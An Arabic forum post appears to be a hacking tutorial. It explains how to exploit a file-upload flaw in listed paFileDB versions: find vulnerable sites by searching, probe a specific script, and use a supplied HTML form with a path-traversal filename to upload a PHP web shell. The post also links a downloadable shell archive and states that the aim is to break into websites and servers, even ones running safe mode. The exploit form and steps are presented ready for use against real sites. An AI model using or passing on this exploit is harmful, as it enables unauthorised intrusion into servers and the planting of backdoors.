بسم الله الرحمن الرحيم اما بعد
سأضع اليوم ثغرة قوية ومصاب بها كثير من المنتديات
السلام علكم
قبل ما اطرح الموضوع
بقولكم انتو اتعرفون ثغرة دليل البرامج
بهذه الثغرة ترفع شل وتخترق الموقع
بس المشكله الي كانت امخربه على الثغرة انك بعد ما ترفع الشل ما تستفيد منه لان الموقع سيف مود
بحط لكم شرح حق الثغره موجود عندي من زمان والله ما اذكر حتي منو كاتب الموضوع
وبعد الشرح بشرح لكم كيفية حل مشكله السيف مود
اقتباس:
شرح ثغرة دليل البرامج
مفيده لرفع الشيل
الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.
============
(البرامج المصابه)
PHP Arena paFileDB 1.1.3
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 3.1
============
أذهب إلى أي محرك بحث منثل جوجل
وأكتب أيا من البرامج السابقة مثلا:
PHP Arena paFileDB 3.1
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:
http://www.truez.com/downloadنضيف عليه هالوصلة:
includes/team/file.php
ليصبح:
http://www.truez.com/download/includes/team/file.phpالأن ضع اللنك في المتصفح وأضغط أنتر:
إذا طلع لك هكذا
[ ] - [ ] - [ ]
يعني الموقع مصاب بالثغرة.
الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:
1- نعمل مجلد على القرص C: ونسميه مثلا: Virus
2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php
3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:
======================
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
======================
مع مراعاة تغيير:
http://www.truez.com/download/includes/team/file.phpإلى الموقع المصاب.
و
777.php
إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777
4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة.
ويمكننا أستعراضه من هذا اللنك:
http://www.truez.com/download/uploads/777.php وصلة تحميل الشل الروسي
http://cgi.outlaw.plus.com/pafiledb/...oexecshell.zipحبيت اقول لكم شي
تقدرون تستفدون من هذا الشي بشيين
اول شي : تخترقون موقع حتي لو كان فيه سيف مود
ثاني شي : يكون عندك مركز لتحميل الملفات خاص فيكم